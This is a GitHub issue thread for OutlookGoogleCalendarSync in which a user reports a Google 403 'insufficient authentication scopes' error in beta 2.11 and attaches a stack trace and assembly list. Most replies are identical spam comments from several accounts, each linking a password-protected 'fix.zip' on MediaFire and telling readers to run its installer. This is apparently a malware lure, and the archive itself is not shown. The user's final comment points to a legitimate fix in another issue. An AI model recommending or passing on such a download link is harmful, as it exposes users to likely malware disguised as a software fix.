### ISSUE TITLE
Beta vsn 2.11 does not allow connection to Google

### ISSUE THREAD

**Issue by Ammo999** [phw198/OutlookGoogleCalendarSync#1947]
> Checklist:-
> * [ ] [Upgrade](https://github.com/phw198/OutlookGoogleCalendarSync/wiki/Upgrading) to the latest release (alpha if available) ![latest release](https://img.shields.io/github/release/phw198/OutlookGoogleCalendarSync/all.svg)
> * [ ] Reproduce the issue
> * [ ] Complete the information below
> * [ ] Provide your `OGcalsync.log` file (see [how-to](https://github.com/phw198/OutlookGoogleCalendarSync/wiki/Reporting-problems#locating-your-ogcalsynclog-file))

**OGCS Version**: v2.11.0.0
**Edition**: Installed 
**Sync Direction**:  O<->G

**Bug Description**  
I am unable to connect to my google calendar - I have internet connection. I can go into my google account and access calendar there.

**Steps to Reproduce the Issue**  
1. launch Google Calendar Sycn
2. sync -> start sync

**Any other information**  
Any additional information that may help troubleshoot the issue.  
:paperclip: Attach your `OGcalsync.log` file.

[OGcalsync.log](https://github.com/user-attachments/files/16748253/OGcalsync.log)
[OGcalsync.log](https://github.com/user-attachments/files/16748259/OGcalsync.log)
[OGcalsync.log](https://github.com/user-attachments/files/16748270/OGcalsync.log)
[OGcalsync_2024-08-24.log](https://github.com/user-attachments/files/16748271/OGcalsync_2024-08-24.log)

<details><summary>JIT Debug</summary>

```
See the end of this message for details on invoking 
just-in-time (JIT) debugging instead of this dialog box.

************** Exception Text **************
The service calendar has thrown an exception.
HttpStatusCode is Forbidden.
Google.Apis.Requests.RequestError
Request had insufficient authentication scopes. [403]
Errors [
	Message[Insufficient Permission] Location[ - ] Reason[insufficientPermissions] Domain[global]
]

Google.GoogleApiException: The service calendar has thrown an exception. HttpStatusCode is Forbidden. Request had insufficient authentication scopes.
   at Google.Apis.Requests.ClientServiceRequest`1.<ParseResponse>d__35.MoveNext()
--- End of stack trace from previous location where exception was thrown ---
   at System.Runtime.ExceptionServices.ExceptionDispatchInfo.Throw()
   at Google.Apis.Requests.ClientServiceRequest`1.Execute()
   at OutlookGoogleCalendarSync.Google.Authenticator.UserSubscriptionCheck() in C:\Users\Paul\Git\OutlookGoogleCalendarSync\src\OutlookGoogleCalendarSync\Google\Authenticator.cs:line 369
   at OutlookGoogleCalendarSync.Google.Authenticator.OgcsUserStatus() in C:\Users\Paul\Git\OutlookGoogleCalendarSync\src\OutlookGoogleCalendarSync\Google\Authenticator.cs:line 314
   at OutlookGoogleCalendarSync.Google.Calendar.get_Instance() in C:\Users\Paul\Git\OutlookGoogleCalendarSync\src\OutlookGoogleCalendarSync\Google\GoogleCalendar.cs:line 32
   at OutlookGoogleCalendarSync.Forms.Main.cbGoogleCalendars_BuildList() in C:\Users\Paul\Git\OutlookGoogleCalendarSync\src\OutlookGoogleCalendarSync\Forms\MainForm.cs:line 1578
   at OutlookGoogleCalendarSync.Forms.Main.GetMyGoogleCalendars_Click(Object sender, EventArgs e) in C:\Users\Paul\Git\OutlookGoogleCalendarSync\src\OutlookGoogleCalendarSync\Forms\MainForm.cs:line 1570
   at System.Windows.Forms.Control.OnClick(EventArgs e)
   at System.Windows.Forms.Button.OnClick(EventArgs e)
   at System.Windows.Forms.Button.WndProc(Message& m)
   at System.Windows.Forms.Control.ControlNativeWindow.OnMessage(Message& m)
   at System.Windows.Forms.Control.ControlNativeWindow.WndProc(Message& m)
   at System.Windows.Forms.NativeWindow.Callback(IntPtr hWnd, Int32 msg, IntPtr wparam, IntPtr lparam)


************** Loaded Assemblies **************
mscorlib
    Assembly Version: 4.0.0.0
    Win32 Version: 4.8.9261.0 built by: NET481REL1LAST_C
    CodeBase: file:///C:/Windows/Microsoft.NET/Framework/v4.0.30319/mscorlib.dll
----------------------------------------
OutlookGoogleCalendarSync
    Assembly Version: 2.11.8982.43122
    Win32 Version: 2.11.0.0
    CodeBase: file:///C:/Users/amjad/AppData/Local/OutlookGoogleCalendarSync/app-2.11.0-beta/OutlookGoogleCalendarSync.exe
----------------------------------------
System.Windows.Forms
    Assembly Version: 4.0.0.0
    Win32 Version: 4.8.9251.0 built by: NET481REL1LAST_C
    CodeBase: file:///C:/Windows/Microsoft.Net/assembly/GAC_MSIL/System.Windows.Forms/v4.0_4.0.0.0__b77a5c561934e089/System.Windows.Forms.dll
----------------------------------------
log4net
    Assembly Version: 2.0.15.0
    Win32 Version: 2.0.15.0
    CodeBase: file:///C:/Users/amjad/AppData/Local/OutlookGoogleCalendarSync/app-2.11.0-beta/log4net.DLL
----------------------------------------
System.Configuration
    Assembly Version: 4.0.0.0
    Win32 Version: 4.8.9032.0 built by: NET481REL1
    CodeBase: file:///C:/Windows/Microsoft.Net/assembly/GAC_MSIL/System.Configuration/v4.0_4.0.0.0__b03f5f7f11d50a3a/System.Configuration.dll
----------------------------------------
System
    Assembly Version: 4.0.0.0
    Win32 Version: 4.8.9261.0 built by: NET481REL1LAST_C
    CodeBase: file:///C:/Windows/Microsoft.Net/assembly/GAC_MSIL/System/v4.0_4.0.0.0__b77a5c561934e089/System.dll
----------------------------------------
System.Core
    Assembly Version: 4.0.0.0
    Win32 Version: 4.8.9261.0 built by: NET481REL1LAST_C
    CodeBase: file:///C:/Windows/Microsoft.Net/assembly/GAC_MSIL/System.Core/v4.0_4.0.0.0__b77a5c561934e089/System.Core.dll
----------------------------------------
System.Xml
    Assembly Version: 4.0.0.0
    Win32 Version: 4.8.9032.0 built by: NET481REL1
    CodeBase: file:///C:/Windows/Microsoft.Net/assembly/GAC_MSIL/System.Xml/v4.0_4.0.0.0__b77a5c561934e089/System.Xml.dll
----------------------------------------
System.Drawing
    Assembly Version: 4.0.0.0
    Win32 Version: 4.8.9032.0 built by: NET481REL1
    CodeBase: file:///C:/Windows/Microsoft.Net/assembly/GAC_MSIL/System.Drawing/v4.0_4.0.0.0__b03f5f7f11d50a3a/System.Drawing.dll
----------------------------------------
Squirrel
    Assembly Version: 1.9.0.0
    Win32 Version: 1.9.0.1
    CodeBase: file:///C:/Users/amjad/AppData/Local/OutlookGoogleCalendarSync/app-2.11.0-beta/Squirrel.DLL
----------------------------------------
Splat
    Assembly Version: 1.6.2.0
    Win32 Version: 1.6.2
    CodeBase: file:///C:/Users/amjad/AppData/Local/OutlookGoogleCalendarSync/app-2.11.0-beta/Splat.DLL
----------------------------------------
System.Management
    Assembly Version: 4.0.0.0
    Win32 Version: 4.8.9032.0 built by: NET481REL1
    CodeBase: file:///C:/Windows/Microsoft.Net/assembly/GAC_MSIL/System.Management/v4.0_4.0.0.0__b03f5f7f11d50a3a/System.Management.dll
----------------------------------------
Newtonsoft.Json
    Assembly Version: 13.0.0.0
    Win32 Version: 13.0.2.27524
    CodeBase: file:///C:/Users/amjad/AppData/Local/OutlookGoogleCalendarSync/app-2.11.0-beta/Newtonsoft.Json.DLL
----------------------------------------
Google.Cloud.Logging.Log4Net
    Assembly Version: 2.5.0.0
    Win32 Version: 2.5.0.0
    CodeBase: file:///C:/Users/amjad/AppData/Local/OutlookGoogleCalendarSync/app-2.11.0-beta/Google.Cloud.Logging.Log4Net.DLL
----------------------------------------
Google.Cloud.Logging.V2
    Assembly Version: 2.3.0.0
    Win32 Version: 2.3.0.0
    CodeBase: file:///C:/Users/amjad/AppData/Local/OutlookGoogleCalendarSync/app-2.11.0-beta/Google.Cloud.Logging.V2.DLL
----------------------------------------
Google.Protobuf
    Assembly Version: 3.17.3.0
    Win32 Version: 3.17.3.0
    CodeBase: file:///C:/Users/amjad/AppData/Local/OutlookGoogleCalendarSync/app-2.11.0-beta/Google.Protobuf.DLL
----------------------------------------
Google.Cloud.Logging.Type
    Assembly Version: 2.1.0.0
    Win32 Version: 2.1.0.0
    CodeBase: file:///C:/Users/amjad/AppData/Local/OutlookGoogleCalendarSync/app-2.11.0-beta/Google.Cloud.Logging.Type.DLL
----------------------------------------
Google.Api.Gax
    Assembly Version: 2.10.0.0
    Win32 Version: 2.10.0.0
    CodeBase: file:///C:/Users/amjad/AppData/Local/OutlookGoogleCalendarSync/app-2.11.0-beta/Google.Api.Gax.DLL
----------------------------------------
Google.Api.CommonProtos
    Assembly Version: 1.7.0.0
    Win32 Version: 1.7.0.0
    CodeBase: file:///C:/Users/amjad/AppData/Local/OutlookGoogleCalendarSync/app-2.11.0-beta/Google.Api.CommonProtos.DLL
----------------------------------------
Google.Api.Gax.Grpc
    Assembly Version: 2.10.0.0
    Win32 Version: 2.10.0.0
    CodeBase: file:///C:/Users/amjad/AppData/Local/OutlookGoogleCalendarSync/app-2.11.0-beta/Google.Api.Gax.Grpc.DLL
----------------------------------------
Google.Apis.Auth
    Assembly Version: 1.60.0.0
    Win32 Version: 1.60.0.0
    CodeBase: file:///C:/Users/amjad/AppData/Local/OutlookGoogleCalendarSync/app-2.11.0-beta/Google.Apis.Auth.DLL
----------------------------------------
Google.Apis.Core
    Assembly Version: 1.60.0.0
    Win32 Version: 1.60.0.0
    CodeBase: file:///C:/Users/amjad/AppData/Local/OutlookGoogleCalendarSync/app-2.11.0-beta/Google.Apis.Core.DLL
----------------------------------------
Grpc.Core
    Assembly Version: 1.0.0.0
    Win32 Version: 1.22.1.0
    CodeBase: file:///C:/Users/amjad/AppData/Local/OutlookGoogleCalendarSync/app-2.11.0-beta/Grpc.Core.DLL
----------------------------------------
Grpc.Core.Api
    Assembly Version: 1.0.0.0
    Win32 Version: 1.22.0.0
    CodeBase: file:///C:/Users/amjad/AppData/Local/OutlookGoogleCalendarSync/app-2.11.0-beta/Grpc.Core.Api.DLL
----------------------------------------
Grpc.Auth
    Assembly Version: 1.0.0.0
    Win32 Version: 1.22.0.0
    CodeBase: file:///C:/Users/amjad/AppData/Local/OutlookGoogleCalendarSync/app-2.11.0-beta/Grpc.Auth.DLL
----------------------------------------
System.Numerics
    Assembly Version: 4.0.0.0
    Win32 Version: 4.8.9032.0 built by: NET481REL1
    CodeBase: file:///C:/Windows/Microsoft.Net/assembly/GAC_MSIL/System.Numerics/v4.0_4.0.0.0__b77a5c561934e089/System.Numerics.dll
----------------------------------------
System.Runtime.Serialization
    Assembly Version: 4.0.0.0
    Win32 Version: 4.8.9241.0 built by: NET481REL1LAST_C
    CodeBase: file:///C:/Windows/Microsoft.Net/assembly/GAC_MSIL/System.Runtime.Serialization/v4.0_4.0.0.0__b77a5c561934e089/System.Runtime.Serialization.dll
----------------------------------------
System.Data
    Assembly Version: 4.0.0.0
    Win32 Version: 4.8.9214.0 built by: NET481REL1LAST_B
    CodeBase: file:///C:/Windows/Microsoft.Net/assembly/GAC_32/System.Data/v4.0_4.0.0.0__b77a5c561934e089/System.Data.dll
----------------------------------------
System.Net.Http
    Assembly Version: 4.0.0.0
    Win32 Version: 4.8.9032.0 built by: NET481REL1
    CodeBase: file:///C:/Windows/Microsoft.Net/assembly/GAC_MSIL/System.Net.Http/v4.0_4.0.0.0__b03f5f7f11d50a3a/System.Net.Http.dll
----------------------------------------
System.Xml.Linq
    Assembly Version: 4.0.0.0
    Win32 Version: 4.8.9032.0 built by: NET481REL1
    CodeBase: file:///C:/Windows/Microsoft.Net/assembly/GAC_MSIL/System.Xml.Linq/v4.0_4.0.0.0__b77a5c561934e089/System.Xml.Linq.dll
----------------------------------------
NuGet.Squirrel
    Assembly Version: 3.0.0.0
    Win32 Version: 3.0.0.0
    CodeBase: file:///C:/Users/amjad/AppData/Local/OutlookGoogleCalendarSync/app-2.11.0-beta/NuGet.Squirrel.DLL
----------------------------------------
Accessibility
    Assembly Version: 4.0.0.0
    Win32 Version: 4.8.9032.0 built by: NET481REL1
    CodeBase: file:///C:/Windows/Microsoft.Net/assembly/GAC_MSIL/Accessibility/v4.0_4.0.0.0__b03f5f7f11d50a3a/Accessibility.dll
----------------------------------------
SMDiagnostics
    Assembly Version: 4.0.0.0
    Win32 Version: 4.8.9241.0 built by: NET481REL1LAST_C
    CodeBase: file:///C:/Windows/Microsoft.Net/assembly/GAC_MSIL/SMDiagnostics/v4.0_4.0.0.0__b77a5c561934e089/SMDiagnostics.dll
----------------------------------------
System.ServiceModel.Internals
    Assembly Version: 4.0.0.0
    Win32 Version: 4.8.9241.0 built by: NET481REL1LAST_C
    CodeBase: file:///C:/Windows/Microsoft.Net/assembly/GAC_MSIL/System.ServiceModel.Internals/v4.0_4.0.0.0__31bf3856ad364e35/System.ServiceModel.Internals.dll
----------------------------------------
NodaTime
    Assembly Version: 2.4.18.0
    Win32 Version: 2.4.18.0
    CodeBase: file:///C:/Users/amjad/AppData/Local/OutlookGoogleCalendarSync/app-2.11.0-beta/NodaTime.DLL
----------------------------------------
Microsoft.mshtml
    Assembly Version: 7.0.3300.0
    Win32 Version: 7.0.3300.0
    CodeBase: file:///C:/Windows/assembly/GAC/Microsoft.mshtml/7.0.3300.0__b03f5f7f11d50a3a/Microsoft.mshtml.dll
----------------------------------------
Microsoft.Office.Interop.Outlook
    Assembly Version: 15.0.0.0
    Win32 Version: 15.0.4569.1507
    CodeBase: file:///C:/Windows/assembly/GAC_MSIL/Microsoft.Office.Interop.Outlook/15.0.0.0__71e9bce111e9429c/Microsoft.Office.Interop.Outlook.dll
----------------------------------------
office
    Assembly Version: 15.0.0.0
    Win32 Version: 15.0.4613.1000
    CodeBase: file:///C:/Windows/assembly/GAC_MSIL/office/15.0.0.0__71e9bce111e9429c/office.dll
----------------------------------------
Microsoft.CSharp
    Assembly Version: 4.0.0.0
    Win32 Version: 4.8.9032.0
    CodeBase: file:///C:/Windows/Microsoft.Net/assembly/GAC_MSIL/Microsoft.CSharp/v4.0_4.0.0.0__b03f5f7f11d50a3a/Microsoft.CSharp.dll
----------------------------------------
CustomMarshalers
    Assembly Version: 4.0.0.0
    Win32 Version: 4.8.9032.0 built by: NET481REL1
    CodeBase: file:///C:/Windows/Microsoft.Net/assembly/GAC_32/CustomMarshalers/v4.0_4.0.0.0__b03f5f7f11d50a3a/CustomMarshalers.dll
----------------------------------------
Anonymously Hosted DynamicMethods Assembly
    Assembly Version: 0.0.0.0
    Win32 Version: 4.8.9261.0 built by: NET481REL1LAST_C
    CodeBase: file:///C:/Windows/Microsoft.Net/assembly/GAC_32/mscorlib/v4.0_4.0.0.0__b77a5c561934e089/mscorlib.dll
----------------------------------------
System.Web
    Assembly Version: 4.0.0.0
    Win32 Version: 4.8.9261.0 built by: NET481REL1LAST_C
    CodeBase: file:///C:/Windows/Microsoft.Net/assembly/GAC_32/System.Web/v4.0_4.0.0.0__b03f5f7f11d50a3a/System.Web.dll
----------------------------------------
Google.Apis.Calendar.v3
    Assembly Version: 1.60.0.3088
    Win32 Version: 1.60.0.3088
    CodeBase: file:///C:/Users/amjad/AppData/Local/OutlookGoogleCalendarSync/app-2.11.0-beta/Google.Apis.Calendar.v3.DLL
----------------------------------------
Google.Apis
    Assembly Version: 1.60.0.0
    Win32 Version: 1.60.0.0
    CodeBase: file:///C:/Users/amjad/AppData/Local/OutlookGoogleCalendarSync/app-2.11.0-beta/Google.Apis.DLL
----------------------------------------
Google.Cloud.DevTools.Common
    Assembly Version: 1.1.0.0
    Win32 Version: 1.1.0.0
    CodeBase: file:///C:/Users/amjad/AppData/Local/OutlookGoogleCalendarSync/app-2.11.0-beta/Google.Cloud.DevTools.Common.DLL
----------------------------------------
System.Memory
    Assembly Version: 4.0.1.1
    Win32 Version: 4.6.28619.01
    CodeBase: file:///C:/Users/amjad/AppData/Local/OutlookGoogleCalendarSync/app-2.11.0-beta/System.Memory.DLL
----------------------------------------
netstandard
    Assembly Version: 2.0.0.0
    Win32 Version: 4.8.9032.0
    CodeBase: file:///C:/Windows/Microsoft.Net/assembly/GAC_MSIL/netstandard/v4.0_2.0.0.0__cc7b13ffcd2ddd51/netstandard.dll
----------------------------------------
System.Runtime.CompilerServices.Unsafe
    Assembly Version: 4.0.4.1
    Win32 Version: 4.6.28619.01
    CodeBase: file:///C:/Users/amjad/AppData/Local/OutlookGoogleCalendarSync/app-2.11.0-beta/System.Runtime.CompilerServices.Unsafe.DLL
----------------------------------------
System.Runtime
    Assembly Version: 4.0.0.0
    Win32 Version: 4.8.9032.0
    CodeBase: file:///C:/Windows/Microsoft.Net/assembly/GAC_MSIL/System.Runtime/v4.0_4.0.0.0__b03f5f7f11d50a3a/System.Runtime.dll
----------------------------------------

************** JIT Debugging **************
To enable just-in-time (JIT) debugging, the .config file for this
application or computer (machine.config) must have the
jitDebugging value set in the system.windows.forms section.
The application must also be compiled with debugging
enabled.

For example:

<configuration>
    <system.windows.forms jitDebugging="true" />
</configuration>

When JIT debugging is enabled, any unhandled exception
will be sent to the JIT debugger registered on the computer
rather than be handled by this dialog box.
```
</details>

**Comment by itbear-shu** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by haohaohaoadsad** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by JONTY650413** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by luozhengdong** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by itbear-shu** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by haohaohaoadsad** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by JONTY650413** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Lxx-c** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Ammo999** [comment]
fixed it now - it works when using the instructions in https://github.com/phw198/OutlookGoogleCalendarSync/issues/1937
thanks
